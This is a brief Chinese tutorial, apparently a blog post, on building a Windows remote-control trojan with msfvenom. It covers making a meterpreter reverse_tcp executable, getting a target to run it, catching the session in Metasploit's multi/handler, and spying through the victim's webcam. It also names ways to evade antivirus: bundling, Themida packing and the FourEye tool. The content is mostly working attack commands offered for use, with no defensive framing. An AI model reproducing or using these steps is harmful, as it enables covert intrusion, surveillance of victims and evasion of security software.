生成木马获取权限

1、msfvenom生成远控木马

在kali中直接使用这个命令，桌面会生成一个文件，就是这个病毒了。想办法发送给目标让其运行。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.183.131 lport=9999 -f exe -o demo.exe

2、设置

进入msfconsole控制台

msfconsole

输入

use exploit/multi/handler   #这是一个常用的模块

然后三部曲，查看设置，配置设置，启动模块

show ops

set payload windows/x64/meterpreter/reverse_tcp

设置kali的ip地址和端口

set lhost 192.168.188.130
set lport 9999

然后运行

run

3、使用权限

使用help查看可以使用的权限

help

这里以打开摄像头为例，先查看摄像头是否存在

webcam_list

如果存在，则可以实现监控

webcam_stream

4、木马一般都是会被杀毒软件杀了的，这里有两种方式

1、捆绑软件

2、加壳

压缩壳，加密壳

这个加壳软件themida

3、一款很棒的免杀工具 FourEye，这个没研究过，后面在研究研究。